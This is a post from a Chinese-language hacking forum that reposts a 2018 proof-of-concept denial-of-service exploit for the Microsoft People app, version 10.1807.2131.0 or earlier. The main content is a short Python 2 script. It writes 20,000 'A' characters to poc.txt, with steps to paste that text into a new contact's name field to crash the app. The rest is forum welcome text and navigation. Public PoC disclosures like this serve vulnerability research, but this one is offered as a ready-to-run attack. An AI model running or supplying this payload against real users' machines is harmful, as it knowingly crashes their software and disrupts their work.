Microsoft People 10.1807.2131.0 - Denial of service (PoC) - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日3年前

# Exploit Title: Microsoft people 10.1807.2131.0 - Denial of service (PoC)
# Exploit Author : L0RD
# Contact: [email protected]
# Date: 2018-09-04
# Vendor Homepage : https://www.microsoft.com
# Software link: https://www.microsoft.com/en-us/p/microsoft-people/9nblggh10pg8?activetab=pivot:overviewtab
# Version: <= 10.1807.2131.0
# Tested on: Windows 10
# CVE: N/A

# Description:
# Microsoft people desktop application is a contact management app and
# address book included in Microsoft's Windows 8 and 10.
# It allows a user to organize and link contacts from different email
# accounts with a unique graphical interface
# More information :
# https://support.microsoft.com/en-us/help/14103/windows-people-app-help

# Steps to reproduce:
# 1) Run the python exploit code and copy content of file.
# 2) Open people application
# 3) Click on "new contact (+)" and paste content of "poc.txt" into name filed and save contact
# 4) Crash!

#!/usr/bin/python

buffer = "\x41" * 20000
payload = buffer
try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Microsoft People 10.1807.2131.0 - Denial of service (PoC)

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索